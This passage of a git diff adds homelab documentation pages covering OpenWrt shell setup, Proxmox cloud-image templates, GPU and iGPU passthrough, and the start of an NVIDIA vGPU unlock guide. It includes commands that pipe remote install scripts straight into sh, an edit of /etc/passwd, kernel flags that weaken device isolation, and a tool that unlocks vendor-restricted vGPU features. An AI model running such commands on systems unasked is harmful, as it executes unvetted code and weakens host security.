+/etc/init.d/network restart
+
You might as well disable odhcpd:
/etc/init.d/odhcpd disable
+/etc/init.d/odhcpd stop
+
And finally you can delete the IPv6 ULA Prefix:
uci -q delete network.globals.ula_prefix
+uci commit network
+/etc/init.d/network restart
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/openwrt/install-oh-my-zsh/index.html b/infrastructure/openwrt/install-oh-my-zsh/index.html
new file mode 100644
index 000000000..c7efcafe2
--- /dev/null
+++ b/infrastructure/openwrt/install-oh-my-zsh/index.html
@@ -0,0 +1,176 @@
+
oh-my-zsh Install - 3os template markdown Authors: fire1ce | Created: 2022-04-03 | Last update: 2022-12-15 Install oh-my-zsh on OpenWrt You can install oh-my-zsh on OpenWrt, make sure to use the Prevent User Lockout
option since many users been locked out of their sessions since the zsh
shell was not installed or loaded properly.
What's ZSH Z-shell (Zsh) is a Unix shell that can be used as an interactive login shell and as a shell scripting command interpreter. Zsh is an enhanced Bourne shell with many enhancements, including some Bash, ksh and tcsh features.
What's Oh-My-Zsh Oh My Zsh is an open source, community-driven framework for managing your zsh configuration.
Installation of oh-my-zsh Install Requirements Packages
opkg update && opkg install ca-certificates zsh curl git-http
+
Install oh-my-zsh
sh -c " $( curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh) "
+
Set zsh as default (thanks to @mlouielu )
which zsh && sed -i -- 's:/bin/ash:' ` which zsh` ':g' /etc/passwd
+
Prevent User Lockout To prevent lock-outs after accidentally removing zsh (thanks to @fox34 ) (as explained in the wiki you can add a check for zsh
and fallback to ash
in /etc/rc.local
:
# Revert root shell to ash if zsh is not available
+if grep -q '^root:.*:/usr/bin/zsh$' /etc/passwd && [ ! -x /usr/bin/zsh ] ; then
+ # zsh is root shell, but zsh was not found or not executable: revert to default ash
+ [ -x /usr/bin/logger ] && /usr/bin/logger -s "Reverting root shell to ash, as zsh was not found on the system"
+ sed -i -- 's:/usr/bin/zsh:/bin/ash:g' /etc/passwd
+fi
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/openwrt/snippets/index.html b/infrastructure/openwrt/snippets/index.html
new file mode 100644
index 000000000..6c5a1eca4
--- /dev/null
+++ b/infrastructure/openwrt/snippets/index.html
@@ -0,0 +1,171 @@
+
Snippets - 3os template markdown Authors: fire1ce | Created: 2022-12-15 | Last update: 2022-12-19 Snippets and Tips OpenWrt Snippets with useful commands and scripts. Best practices and tips.
Update all packages on OpenWrt from SSH opkg update && opkg list-upgradable | cut -f 1 -d ' ' | xargs opkg upgrade
+
Enable LuCI HTTPS redirect from HTTP This will activate the HTTPS redirect from HTTP in LuCI.
uci set uhttpd.main.redirect_https= 1
+uci commit uhttpd
+service uhttpd reload
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/cloud-image-template/index.html b/infrastructure/proxmox/cloud-image-template/index.html
new file mode 100644
index 000000000..97b9f6498
--- /dev/null
+++ b/infrastructure/proxmox/cloud-image-template/index.html
@@ -0,0 +1,179 @@
+
Cloud Image Template - 3os proxmox virtualization Authors: fire1ce | Created: 2022-06-26 | Last update: 2022-06-27 Proxmox Cloud Image Template About Cloud Images Cloud images are operating system templates and every instance starts out as an identical clone of every other instance. It is the user data that gives every cloud instance its personality and cloud-init is the tool that applies user data to your instances automatically.
Advantage of Cloud Image Template Predefined SSH keys Predefined user account Predefined network configuration VM creation time is under few minutes No installation process required like with ISO images First boot always updated with latest updates Ubuntu Cloud Images Ubuntu provides official cloud images you can find the proper image for your needs at cloud-images.ubuntu.com .
In this tutorial we will be using Ubuntu Server 22.04 LTS Jammy Jellyfish
cloud image.
Create Cloud Image Template SSH to you Proxmox server.
Download the cloud image template from the official website.
wget https://cloud-images.ubuntu.com/jammy/current/jammy-server-cloudimg-amd64.img
+
In order to create a cloud image template first of all we need to create a new VM
. After we will configure it we will create a Template
from it.
The following parameters will predefine our Base Template
Command parameters description:
9000 : VM ID in Proxmox. I prefer to use high number for management purposes. memory : VM's memory in MB. core : Number of CPU cores for the VM. name : Name of the VM and the template. net0 : Network interface for the VM. bridge : Network bridge for the VM. agent : Enable or disable QEMU agent support. onboot : Enable or disable VM start on boot. Create a new virtual machine.
qm create 9000 --memory 2048 --core 2 --name ubuntu-22.04-cloud --net0 virtio,bridge= vmbr0 --agent enabled = 1 --onboot 1
+
The default storage Proxmox creates for vm is storage1 . In my case I use different storage for vm's and templates named storage1 . The following commands will utilize the storage1 storage. Change the storage name for your Proxmox server.
Import the downloaded Ubuntu Cloud Image
we downloaded before disk to the storage.
qm importdisk 9000 jammy-server-cloudimg-amd64.img storage1
+
Attach the new disk to the vm as a scsi
drive on the scsi
controller
qm set 9000 --scsihw virtio-scsi-pci --scsi0 storage1:vm-9000-disk-0
+
Add cloud init drive
qm set 9000 --ide2 storage1:cloudinit
+
Make the cloud init drive bootable and restrict BIOS to boot from disk only
qm set 9000 --boot c --bootdisk scsi0
+
Add serial console
qm set 9000 --serial0 socket --vga serial0
+
WARNING: DO NOT START THE VM
Powering on the vm will create a unique ID that will persist with the template. We want to avoid this.
Now head to the Proxmox web interface. Select the new vm and Cloud-Init
tab.
Configure the default setting for the cloud image template. This will allow the VM to start with predefined user, password, ssh keys and network configuration.
At this point we configured the VM and we can create a cloud image template from it.
Create a new cloud image template.
Now you can use the Cloud Image Template to create new vm instances. You can do it from the Proxmox web interface or from the command line.
Tip
Use Full Clone when creating a new VM from a cloud image template. Linked Clone will prevent you from deleting the cloud image template.
Cli example:
qm clone 9000 122 --name my-new-vm --full
+
VM's Storage Since we are using a minimal cloud image template. Cloned VM's will use the same storage as the template which is about 2GB of disk space.
You can utilize an automated script to expand the disk space of the cloned VM: VM Disk Expander
Troubleshooting Resetting VM's machine-id
Run the following command inside the VM to reset the machine-id.
sudo rm -f /etc/machine-id
+sudo rm -f /var/lib/dbus/machine-id
+
Shutdown the VM. Then power it back on. The machine-id will be regenerated.
If the machine-id is not regenerated you can try to fix it by running the following command.
sudo systemd-machine-id-setup
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/index.html b/infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/index.html
new file mode 100644
index 000000000..8d01caf29
--- /dev/null
+++ b/infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/index.html
@@ -0,0 +1,227 @@
+
GPU Passthrough to VM - 3os proxmox gpu passthrough Authors: fire1ce | Created: 2021-08-27 | Last update: 2023-07-13 Proxmox GPU Passthrough to VM Introduction GPU passthrough is a technology that allows the Linux kernel to present the internal PCI GPU directly to the virtual machine. The device behaves as if it were powered directly by the virtual machine, and the virtual machine detects the PCI device as if it were physically connected. We will cover how to enable GPU passthrough to a virtual machine in Proxmox VE.
Your mileage may vary depending on your hardware.
Proxmox Configuration for GPU Passthrough The following examples uses SSH
connection to the Proxmox server. The editor is nano
but feel free to use any other editor. We will be editing the grub
configuration file.
Find the PCI address of the GPU Device. The following command will show the PCI address of the GPU devices in Proxmox server:
Find the GPU you want to pass through in the result; it should be similar to this:
01 :00.0 VGA compatible controller [ 0300 ] : NVIDIA Corporation TU104 [ GeForce RTX 2080 SUPER] [ 10de:1e81] ( rev a1) ( prog-if 00 [ VGA controller])
+
What we are looking for is the PCI address of the GPU device. In this case it's 01:00.0
. 01:00.0
is only a part of a group of PCI devices on the GPU. We can list all the devices in the group 01:00
by using the following command:
The usual output will include VGA Device and Audio Device. In my case, we have a USB Controller and a Serial bus controller:
01 :00.0 VGA compatible controller: NVIDIA Corporation TU104 [ GeForce RTX 2080 SUPER] ( rev a1)
+01 :00.1 Audio device: NVIDIA Corporation TU104 HD Audio Controller ( rev a1)
+01 :00.2 USB controller: NVIDIA Corporation TU104 USB 3 .1 Host Controller ( rev a1)
+01 :00.3 Serial bus controller [ 0c80] : NVIDIA Corporation TU104 USB Type-C UCSI Controller ( rev a1)
+
Now we need to get the id's of those devices. We can do this by using the following command:
The output should look similar to this:
01 :00.0 0300 : 10de:1e81 ( rev a1)
+01 :00.1 0403 : 10de:10f8 ( rev a1)
+01 :00.2 0c03: 10de:1ad8 ( rev a1)
+01 :00.3 0c80: 10de:1ad9 ( rev a1)
+
What we are looking for are the id pairs; we will use those ids to split the PCI Group into separate devices.
10de:1e81,10de:10f8,10de:1ad8,10de:1ad9
+
Now it's time to edit the grub
configuration file.
Find the line that starts with GRUB_CMDLINE_LINUX_DEFAULT
by default they should look like this:
GRUB_CMDLINE_LINUX_DEFAULT = "quiet"
+
Then change it to look like this (Intel CPU example) and replace vfio-pci.ids=
with the ids for the GPU you want to passthrough:
GRUB_CMDLINE_LINUX_DEFAULT = "quiet intel_iommu=on pcie_acs_override=downstream,multifunction video=efifb:off video=vesa:off vfio-pci.ids=10de:1e81,10de:10f8,10de:1ad8,10de:1ad9 vfio_iommu_type1.allow_unsafe_interrupts=1 kvm.ignore_msrs=1 modprobe.blacklist=radeon,nouveau,nvidia,nvidiafb,nvidia-gpu"
+
Save the config changed and then update GRUB.
Next we need to add vfio
modules to allow PCI passthrough.
Edit the /etc/modules
file.
Add the following line to the end of the file:
# Modules required for PCI passthrough
+vfio
+vfio_iommu_type1
+vfio_pci
+vfio_virqfd
+
Save and exit the editor.
Update configuration changes made in your /etc filesystem
update-initramfs -u -k all
+
Reboot Proxmox to apply the changes
Verify that IOMMU is enabled
dmesg | grep -e DMAR -e IOMMU
+
There should be a line that looks like DMAR: IOMMU enabled
. If there is no output, something is wrong.
[ 0 .000000] Warning: PCIe ACS overrides enabled; This may allow non-IOMMU protected peer-to-peer DMA
+[ 0 .067203] DMAR: IOMMU enabled
+[ 2 .573920] pci 0000 :00:00.2: AMD-Vi: IOMMU performance counters supported
+[ 2 .580393] pci 0000 :00:00.2: AMD-Vi: Found IOMMU cap 0x40
+[ 2 .581776] perf/amd_iommu: Detected AMD IOMMU #0 (2 banks, 4 counters/bank).
+
Check that the GPU is in a separate IOMMU Group by using the following command:
#!/bin/bash
+shopt -s nullglob
+for g in $( find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V) ; do
+ echo "IOMMU Group ${ g ##*/ } :"
+ for d in $g /devices/*; do
+ echo -e "\t $( lspci -nns ${ d ##*/ } ) "
+ done ;
+done ;
+
Now your Proxmox host should be ready to GPU passthrough!
Windows Virtual Machine GPU Passthrough Configuration For better results it's recommended to use this Windows 10/11 Virtual Machine configuration for proxmox .
Limitations & Workarounds
In order for the GPU to function properly in the VM, you must disable Proxmox's Virtual Display - Set it to none
.
You will lose the ability to connect to the VM via Proxmox's Console.
Display must be connected to the physical output of the GPU for the Windows Host to initialize the GPU properly.
You can use a HDMI Dummy Plug as a workaround - It will present itself as a HDMI Display to the Windows Host.
Make sure you have alternative way to connect to the VM for example via Remote Desktop (RDP).
Find the PCI address of the GPU.
This should result in output similar to this:
01 :00.0 VGA compatible controller [ 0300 ] : NVIDIA Corporation TU104 [ GeForce RTX 2080 SUPER] [ 10de:1e81] ( rev a1) ( prog-if 00 [ VGA controller])
+
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the GPU is 01:00.0
.
For best performance the VM should be configured the Machine
type to q35 . This will allow the VM to utilize PCI-Express passthrough.
Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the GPU, which you can find using it’s PCI address. This list uses a different format for the PCI addresses id, 01:00.0
is listed as 0000:01:00.0
.
Select All Functions
, ROM-Bar
, Primary GPU
, PCI-Express
and then click Add
.
The Windows Virtual Machine Proxmox Setting should look like this:
Power on the Windows Virtual Machine.
Connect to the VM via Remote Desktop (RDP) or any other remote access protocol you prefer. Install the latest version of GPU Driver for your GPU.
If all went well you should see the following output in Device Manager
and GPU-Z :
That's it!
Linux Virtual Machine GPU Passthrough Configuration We will be using Ubuntu Server 20.04 LTS. for this guide.
From Proxmox Terminal find the PCI address of the GPU.
This should result in output similar to this:
01 :00.0 VGA compatible controller [ 0300 ] : NVIDIA Corporation TU104 [ GeForce RTX 2080 SUPER] [ 10de:1e81] ( rev a1) ( prog-if 00 [ VGA controller])
+
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the GPU is 01:00.0
.
For best performance the VM should be configured the Machine
type to q35 . This will allow the VM to utilize PCI-Express passthrough.
Open the Device
dropdown and select the GPU, which you can find using it’s PCI address. This list uses a different format for the PCI addresses id, 01:00.0
is listed as 0000:01:00.0
.
Select All Functions
, ROM-Bar
, PCI-Epress
and then click Add
.
The Ubuntu Virtual Machine Proxmox Setting should look like this:
Boot the VM. To test the GPU passthrough was successful, you can use the following command in the VM:
sudo lspci -nnv | grep VGA
+
The output should include the GPU:
01 :00.0 VGA compatible controller [ 0300 ] : NVIDIA Corporation TU104 [ GeForce RTX 2080 SUPER] [ 10de:1e81] ( rev a1) ( prog-if 00 [ VGA controller])
+
Now we need to install the GPU Driver. I'll be covering the installation of Nvidia Drivers in the next example.
Search for the latest Nvidia Driver for your GPU.
sudo apt search nvidia-driver
+
In the next step we will install the Nvidia Driver v535.
Note
--no-install-recommends is important for Headless Server. nvidia-driver-535
will install xorg (GUI) --no-install-recommends
flag will prevent the GUI from being installed.
sudo apt install --no-install-recommends -y build-essential nvidia-driver-535 nvidia-headless-535 nvidia-utils-535 nvidia-cuda-toolkit
+
This will take a while to install. After the installation is complete, you should reboot the VM.
Now let's test the Driver initialization. Run the following command in the VM:
nvidia-smi && nvidia-smi -L
+
If all went well you should see the following output:
That's it! You should now be able to use the GPU for hardware acceleration inside the VM.
Debug Debug Messages - Shows Hardware initialization and errors
Display PCI devices information
Display Driver in use for PCI devices
Display IOMMU Groups the PCI devices are assigned to
#!/bin/bash
+shopt -s nullglob
+for g in $( find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V) ; do
+ echo "IOMMU Group ${ g ##*/ } :"
+ for d in $g /devices/*; do
+ echo -e "\t $( lspci -nns ${ d ##*/ } ) "
+ done ;
+done ;
+
Reboot Proxmox to apply the changes
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/index.html b/infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/index.html
new file mode 100644
index 000000000..727bf4059
--- /dev/null
+++ b/infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/index.html
@@ -0,0 +1,202 @@
+
iGPU Passthrough to VM - 3os proxmox igpu passthrough iGPU Passthrough to VM (Intel Integrated Graphics) Introduction Intel Integrated Graphics (iGPU) is a GPU that is integrated into the CPU. The GPU is a part of the CPU and is used to render graphics. Proxmox may be configured to use iGPU passthrough to VM to allow the VM to use the iGPU for hardware acceleration for example using video encoding/decoding and Transcoding for series like Plex and Emby. This guide will show you how to configure Proxmox to use iGPU passthrough to VM.
Your mileage may vary depending on your hardware. The following guide was tested with Intel Gen8 CPU.
There are two ways to use iGPU passthrough to VM. The first way is to use the Full iGPU Passthrough
to VM. The second way is to use the iGPU GVT-g
technology which allows us to split the iGPU into two parts. We will be covering the Full iGPU Passthrough
. If you want to use the split iGPU GVT-g Passthrough
you can find the guide here .
Proxmox Configuration for iGPU Full Passthrough The following examples uses SSH
connection to the Proxmox server. The editor is nano
but feel free to use any other editor. We will be editing the grub
configuration file.
Edit the grub
configuration file.
Find the line that starts with GRUB_CMDLINE_LINUX_DEFAULT
by default they should look like this:
GRUB_CMDLINE_LINUX_DEFAULT = "quiet"
+
We want to allow passthrough
and Blacklists
known graphics drivers to prevent proxmox from utilizing the iGPU.
Warning
You will lose the ability to use the onboard graphics card to access the Proxmox's console since Proxmox won't be able to use the Intel's gpu
Your GRUB_CMDLINE_LINUX_DEFAULT
should look like this:
GRUB_CMDLINE_LINUX_DEFAULT = "quiet intel_iommu=on iommu=pt pcie_acs_override=downstream,multifunction initcall_blacklist=sysfb_init video=simplefb:off video=vesafb:off video=efifb:off video=vesa:off disable_vga=1 vfio_iommu_type1.allow_unsafe_interrupts=1 kvm.ignore_msrs=1 modprobe.blacklist=radeon,nouveau,nvidia,nvidiafb,nvidia-gpu,snd_hda_intel,snd_hda_codec_hdmi,i915"
+
Note
This will blacklist most of the graphics drivers from proxmox. If you have a specific driver you need to use for Proxmox Host you need to remove it from modprobe.blacklist
Save and exit the editor.
Update the grub configuration to apply the changes the next time the system boots.
Next we need to add vfio
modules to allow PCI passthrough.
Edit the /etc/modules
file.
Add the following line to the end of the file:
# Modules required for PCI passthrough
+vfio
+vfio_iommu_type1
+vfio_pci
+vfio_virqfd
+
Update configuration changes made in your /etc filesystem
update-initramfs -u -k all
+
Save and exit the editor.
Reboot Proxmox to apply the changes
Verify that IOMMU is enabled
dmesg | grep -e DMAR -e IOMMU
+
There should be a line that looks like DMAR: IOMMU enabled
. If there is no output, something is wrong.
[ 0 .000000] Warning: PCIe ACS overrides enabled; This may allow non-IOMMU protected peer-to-peer DMA
+[ 0 .067203] DMAR: IOMMU enabled
+[ 2 .573920] pci 0000 :00:00.2: AMD-Vi: IOMMU performance counters supported
+[ 2 .580393] pci 0000 :00:00.2: AMD-Vi: Found IOMMU cap 0x40
+[ 2 .581776] perf/amd_iommu: Detected AMD IOMMU #0 (2 banks, 4 counters/bank).
+
Windows Virtual Machine iGPU Passthrough Configuration For better results it's recommended to use this Windows 10/11 Virtual Machine configuration for proxmox .
Find the PCI address of the iGPU.
This should result in output similar to this:
00 :02.0 VGA compatible controller [ 0300 ] : Intel Corporation CometLake-S GT2 [ UHD Graphics 630 ] [ 8086 :3e92] ( prog-if 00 [ VGA controller])
+
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the iGPU is 00:02.0
.
For best performance the VM should be configured the Machine
type to q35 . This will allow the VM to utilize PCI-Express passthrough.
Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the iGPU, which you can find using it’s PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Select All Functions
, ROM-Bar
, PCI-Express
and then click Add
.
Tip
I've found that the most consistent way to utilize the GPU acceleration is to disable Proxmox's Virtual Graphics card of the vm. The drawback of disabling the Virtual Graphics card is that it will not be able to access the vm via proxmox's vnc console. The workaround is to enable Remote Desktop (RDP) on the VM before disabling the Virtual Graphics card and accessing the VM via RDP or use any other remote desktop client. If you lose the ability to access the VM via RDP you can temporarily remove the GPU PCI Device and re-enable the virtual graphics card
The Windows Virtual Machine Proxmox Setting should look like this:
Power on the Windows Virtual Machine.
Connect to the VM via Remote Desktop (RDP) or any other remote access protocol you prefer. Install the latest version of Intel's Graphics Driver or use the Intel Driver & Support Assistant installer.
If all went well you should see the following output in Device Manager
and GPU-Z :
That's it!
Linux Virtual Machine iGPU Passthrough Configuration We will be using Ubuntu Server 20.04 LTS for this guide.
From Proxmox Terminal find the PCI address of the iGPU.
This should result in output similar to this:
00 :02.0 VGA compatible controller [ 0300 ] : Intel Corporation CometLake-S GT2 [ UHD Graphics 630 ] [ 8086 :3e92] ( prog-if 00 [ VGA controller])
+
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the iGPU is 00:02.0
.
Open the Device
dropdown and select the iGPU, which you can find using it’s PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Select All Functions
, ROM-Bar
and then click Add
.
The Ubuntu Virtual Machine Proxmox Setting should look like this:
Boot the VM. To test the iGPU passthrough was successful, you can use the following command:
sudo lspci -nnv | grep VGA
+
The output should include the Intel iGPU:
00 :10.0 VGA compatible controller [ 0300 ] : Intel Corporation UHD Graphics 630 ( Desktop) [ 8086 :3e92] ( prog-if 00 [ VGA controller])
+
Now we need to check if the GPU's Driver initialization is working.
The output should include the renderD128
That's it! You should now be able to use the iGPU for hardware acceleration inside the VM and still have proxmox's output on the screen.
Debug Debug Messages - Shows Hardware initialization and errors
Display PCI devices information
Display Driver in use for PCI devices
Display IOMMU Groups the PCI devices are assigned to
#!/bin/bash
+shopt -s nullglob
+for g in $( find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V) ; do
+ echo "IOMMU Group ${ g ##*/ } :"
+ for d in $g /devices/*; do
+ echo -e "\t $( lspci -nns ${ d ##*/ } ) "
+ done ;
+done ;
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/index.html b/infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/index.html
new file mode 100644
index 000000000..744480cc0
--- /dev/null
+++ b/infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/index.html
@@ -0,0 +1,205 @@
+
iGPU Split Passthrough - 3os proxmox igpu passthrough iGPU Split Passthrough (Intel Integrated Graphics) Introduction Intel Integrated Graphics (iGPU) is a GPU that is integrated into the CPU. The GPU is a part of the CPU and is used to render graphics. Proxmox may be configured to use iGPU split passthrough to VM to allow the VM to use the iGPU for hardware acceleration for example using video encoding/decoding and Transcoding for series like Plex and Emby. This guide will show you how to configure Proxmox to use iGPU passthrough to VM.
Your mileage may vary depending on your hardware. The following guide was tested with Intel Gen8 CPU.
Supported CPUs
iGPU GVT-g Split Passthrough
is supported only on Intel's 5th generation to 10th generation CPUs!
Known supported CPU families:
Broadwell
Skylake
Kaby Lake
Coffee Lake
Comet Lake
There are two ways to use iGPU passthrough to VM. The first way is to use the Full iGPU Passthrough
to VM. The second way is to use the iGPU GVT-g
technology which allows us to split the iGPU into two parts. We will be covering the Split iGPU Passthrough
. If you want to use the Full iGPU Passthrough
you can find the guide here .
Proxmox Configuration for GVT-g Split Passthrough The following examples uses SSH
connection to the Proxmox server. The editor is nano
but feel free to use any other editor. We will be editing the grub
configuration file.
Edit the grub
configuration file.
Find the line that starts with GRUB_CMDLINE_LINUX_DEFAULT
by default they should look like this:
GRUB_CMDLINE_LINUX_DEFAULT = "quiet"
+
We want to allow passthrough
and Blacklists
known graphics drivers to prevent proxmox from utilizing the iGPU.
Your GRUB_CMDLINE_LINUX_DEFAULT
should look like this:
GRUB_CMDLINE_LINUX_DEFAULT = "quiet intel_iommu=on i915.enable_gvt=1 iommu=pt pcie_acs_override=downstream,multifunction video=efifb:off video=vesa:off vfio_iommu_type1.allow_unsafe_interrupts=1 kvm.ignore_msrs=1 modprobe.blacklist=radeon,nouveau,nvidia,nvidiafb,nvidia-gpu"
+
Note
This will blacklist most of the graphics drivers from proxmox. If you have a specific driver you need to use for Proxmox Host you need to remove it from modprobe.blacklist
Save and exit the editor.
Update the grub configuration to apply the changes the next time the system boots.
Next we need to add vfio
modules to allow PCI passthrough.
Edit the /etc/modules
file.
Add the following line to the end of the file:
# Modules required for PCI passthrough
+vfio
+vfio_iommu_type1
+vfio_pci
+vfio_virqfd
+
+# Modules required for Intel GVT-g Split
+kvmgt
+
Save and exit the editor.
Update configuration changes made in your /etc filesystem
update-initramfs -u -k all
+
Reboot Proxmox to apply the changes
Verify that IOMMU is enabled
dmesg | grep -e DMAR -e IOMMU
+
There should be a line that looks like DMAR: IOMMU enabled
. If there is no output, something is wrong.
[ 0 .000000] Warning: PCIe ACS overrides enabled; This may allow non-IOMMU protected peer-to-peer DMA
+[ 0 .067203] DMAR: IOMMU enabled
+[ 2 .573920] pci 0000 :00:00.2: AMD-Vi: IOMMU performance counters supported
+[ 2 .580393] pci 0000 :00:00.2: AMD-Vi: Found IOMMU cap 0x40
+[ 2 .581776] perf/amd_iommu: Detected AMD IOMMU #0 (2 banks, 4 counters/bank).
+
Windows Virtual Machine iGPU Passthrough Configuration For better results it's recommended to use this Windows 10/11 Virtual Machine configuration for proxmox .
Find the PCI address of the iGPU.
This should result in output similar to this:
00 :02.0 VGA compatible controller [ 0300 ] : Intel Corporation CometLake-S GT2 [ UHD Graphics 630 ] [ 8086 :3e92] ( prog-if 00 [ VGA controller])
+
If you have multiple VGA, look for the one that has the Intel
in the name.
Here, the PCI address of the iGPU is 00:02.0
.
For best performance the VM should be configured the Machine
type to q35 . This will allow the VM to utilize PCI-Express passthrough.
Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the iGPU, which you can find using it’s PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Click Mdev Type
, You should be presented with a list of the available split passthrough devices choose the better performing one for the vm.
Select ROM-Bar
, PCI-Express
and then click Add
.
The Windows Virtual Machine Proxmox Setting should look like this:
Power on the Windows Virtual Machine.
Open the VM's Console. Install the latest version of Intel's Graphics Driver or use the Intel Driver & Support Assistant installer.
If all went well you should see the following output in Device Manager
and GPU-Z :
That's it! You should now be able to use the iGPU for hardware acceleration inside the VM and still have proxmox's output on the screen.
Linux Virtual Machine iGPU Passthrough Configuration We will be using Ubuntu Server 20.04 LTS for this guide.
From Proxmox Terminal find the PCI address of the iGPU.
This should result in output similar to this:
00 :02.0 VGA compatible controller [ 0300 ] : Intel Corporation CometLake-S GT2 [ UHD Graphics 630 ] [ 8086 :3e92] ( prog-if 00 [ VGA controller])
+
If you have multiple VGA, look for the one that has the Intel
in the name.
Here, the PCI address of the iGPU is 00:02.0
.
VM should be configured the Machine
type to i440fx . Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU to. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the iGPU, which you can find using it’s PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Click Mdev Type
, You should be presented with a list of the available split passthrough devices choose the better performing one for the vm.
Select ROM-Bar
, and then click Add
.
The Ubuntu Virtual Machine Proxmox Setting should look like this:
Boot the VM. To test the iGPU passthrough was successful, you can use the following command:
sudo lspci -nnv | grep VGA
+
The output should include the Intel iGPU:
00 :10.0 VGA compatible controller [ 0300 ] : Intel Corporation UHD Graphics 630 ( Desktop) [ 8086 :3e92] ( prog-if 00 [ VGA controller])
+
Now we need to check if the GPU's Driver initialization is working.
The output should include the renderD128
That's it! You should now be able to use the iGPU for hardware acceleration inside the VM and still have proxmox's output on the screen.
Debug Debug Messages - Shows Hardware initialization and errors
Display PCI devices information
Display Driver in use for PCI devices
Display IOMMU Groups the PCI devices are assigned to
#!/bin/bash
+shopt -s nullglob
+for g in $( find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V) ; do
+ echo "IOMMU Group ${ g ##*/ } :"
+ for d in $g /devices/*; do
+ echo -e "\t $( lspci -nns ${ d ##*/ } ) "
+ done ;
+done ;
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/index.html b/infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/index.html
new file mode 100644
index 000000000..e60eca4dd
--- /dev/null
+++ b/infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/index.html
@@ -0,0 +1,336 @@
+
vGPU Split Passthrough - 3os proxmox vgpu passthrough Authors: fire1ce | Created: 2022-12-03 | Last update: 2023-01-18 vGPU Split Passthrough (Nvidia) Credit and Thanks Thanks to @polloloco for creating and maintaining this guide.
Official GitLab repository: polloloco/vgpu-proxmox
NVIDIA vGPU with the GRID
This document serves as a guide to install NVIDIA vGPU host drivers on the latest Proxmox VE version, which at the time of writing is pve 8.0.
You can follow this guide if you have a vGPU supported card from this list , or if you are using a consumer GPU from the GeForce series or a non-vGPU qualified Quadro GPU. There are several sections with a title similar to "Have a vGPU supported GPU? Read here" in this document, make sure to read those very carefully as this is where the instructions differ for a vGPU qualified card and a consumer card.
Supported cards The following consumer/not-vGPU-qualified NVIDIA GPUs can be used with vGPU: - Most GPUs from the Maxwell 2.0 generation (GTX 9xx, Quadro Mxxxx, Tesla Mxx) EXCEPT the GTX 970 - All GPUs from the Pascal generation (GTX 10xx, Quadro Pxxxx, Tesla Pxx) - All GPUs from the Turing generation (GTX 16xx, RTX 20xx, Txxxx)
If you have GPUs from the Ampere and Ada Lovelace generation, you are out of luck, unless you have a vGPU qualified card from this list like the A5000 or RTX 6000 Ada. If you have one of those cards, please consult the NVIDIA documentation for help with setting it up.
!!! THIS MEANS THAT YOUR RTX 30XX or 40XX WILL NOT WORK !!!
This guide and all my tests were done on a RTX 2080 Ti which is based on the Turing architecture.
Important notes before starting This tutorial assumes you are using a clean install of Proxmox VE 8.0. If you are using Proxmox VE 8.0, you MUST use 16.x drivers. Older versions only work with pve 7 If you tried GPU-passthrough before, you absolutely MUST revert all of the steps you did to set that up. If you only have one GPU in your system with no iGPU, your local monitor will NOT give you any output anymore after the system boots up. Use SSH or a serial connection if you want terminal access to your machine. Most of the steps can be applied to other linux distributions, however I'm only covering Proxmox VE here. Are you upgrading from a previous version of this guide? If you are upgrading from a previous version of this guide, you should uninstall the old driver by running nvidia-uninstall
first.
Then you also have to make sure that you are using the latest version of vgpu_unlock-rs
, otherwise it won't work with the latest driver.
Either delete the folder /opt/vgpu_unlock-rs
or enter the folder and run git pull
and then recompile the library again using cargo build --release
Packages Make sure to add the community pve repo and get rid of the enterprise repo (you can skip this step if you have a valid enterprise subscription)
echo "deb http://download.proxmox.com/debian/pve bookworm pve-no-subscription" >> /etc/apt/sources.list
+rm /etc/apt/sources.list.d/pve-enterprise.list
+
Update and upgrade
apt update
+apt dist-upgrade
+
We need to install a few more packages like git, a compiler and some other tools.
apt install -y git build-essential dkms pve-headers mdevctl
+
Git repos and Rust compiler First, clone this repo to your home folder (in this case /root/
)
git clone https://gitlab.com/polloloco/vgpu-proxmox.git
+
You also need the vgpu_unlock-rs repo
cd /opt
+git clone https://github.com/mbilker/vgpu_unlock-rs.git
+
After that, install the rust compiler
curl https://sh.rustup.rs -sSf | sh -s -- -y --profile minimal
+
Now make the rust binaries available in your $PATH (you only have to do it the first time after installing rust)
source $HOME /.cargo/env
+
Enter the vgpu_unlock-rs
